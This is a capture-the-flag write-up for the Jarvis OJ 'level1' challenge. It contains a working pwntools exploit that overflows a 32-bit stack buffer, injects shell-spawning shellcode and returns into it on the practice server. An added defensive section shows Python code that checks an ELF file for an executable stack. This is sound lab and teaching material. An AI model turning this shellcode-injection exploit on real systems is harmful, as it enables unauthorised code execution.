[XMAN]level1

nc pwn2.jarvisoj.com 9877

 

 



level1.80eacdcd51aca92af7749d96efad7fb5

 

32-bit stack overflow, ret2shellcode.

The exploit is as follows:

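from pwn import *

#io = process('./level1')
io = remote('pwn2.jarvisoj.com', 9877)

# Target is 32-bit Linux; this must be set before asm() is called
context.arch = 'i386'
context.os = 'linux'

shellcode = asm(shellcraft.sh())

# Read the buffer address the service prints between "What's this:" and "?"
io.recvuntil(b"What's this:")
buf_addr = int(io.recvuntil(b'?', drop=True), 16)
info("buf_addr: " + hex(buf_addr))

# Shellcode at the start of the buffer, padded to 140 bytes,
# then the return address overwritten with the buffer address
payload = shellcode.ljust(140, b'\x90')
payload += p32(buf_addr)
io.send(payload)

io.interactive()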
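
ret2shellcode only works when the memory holding the buffer is executable, so the defensive counterpart is to check whether a binary requests an executable stack. The following is an added example, not part of the original post: it reads the `PT_GNU_STACK` program header from an ELF file. The sample ELF bytes are constructed for the demonstration and `make_elf32` is a hypothetical helper.

```python
import struct

PT_GNU_STACK = 0x6474E551  # program header that records the stack permissions
PF_X = 0x1                 # execute bit in p_flags


def stack_is_executable(elf: bytes):
    """True/False from PT_GNU_STACK; None if the binary has no such header."""
    if elf[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    if elf[5] != 1:
        raise ValueError("only little-endian ELF is handled here")
    if elf[4] == 1:      # ELFCLASS32: e_phoff at 28, p_flags at +24
        (e_phoff,) = struct.unpack_from("<I", elf, 28)
        e_phentsize, e_phnum = struct.unpack_from("<HH", elf, 42)
        flags_off = 24
    elif elf[4] == 2:    # ELFCLASS64: e_phoff at 32, p_flags at +4
        (e_phoff,) = struct.unpack_from("<Q", elf, 32)
        e_phentsize, e_phnum = struct.unpack_from("<HH", elf, 54)
        flags_off = 4
    else:
        raise ValueError("unknown ELF class")
    for i in range(e_phnum):
        base = e_phoff + i * e_phentsize
        (p_type,) = struct.unpack_from("<I", elf, base)
        if p_type == PT_GNU_STACK:
            (p_flags,) = struct.unpack_from("<I", elf, base + flags_off)
            return bool(p_flags & PF_X)
    return None


def make_elf32(stack_flags: int) -> bytes:
    """Constructed sample (hypothetical helper): ELF32 header + one PT_GNU_STACK."""
    ident = b"\x7fELF" + bytes([1, 1, 1]) + bytes(9)
    ehdr = ident + struct.pack("<HHIIIIIHHHHHH",
                               2, 3, 1, 0, 52, 0, 0, 52, 32, 1, 0, 0, 0)
    phdr = struct.pack("<8I", PT_GNU_STACK, 0, 0, 0, 0, 0, stack_flags, 16)
    return ehdr + phdr


if __name__ == "__main__":
    for label, flags in (("RWX stack", 7), ("RW stack", 6)):
        print(label, "->", stack_is_executable(make_elf32(flags)))
```

A result of `True` means the stack is mapped executable; linking with `-z noexecstack` clears the flag. A result of `None` means the header is absent and the loader's architecture default applies.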

 

posted @ 2021-07-17 14:34  hktk1643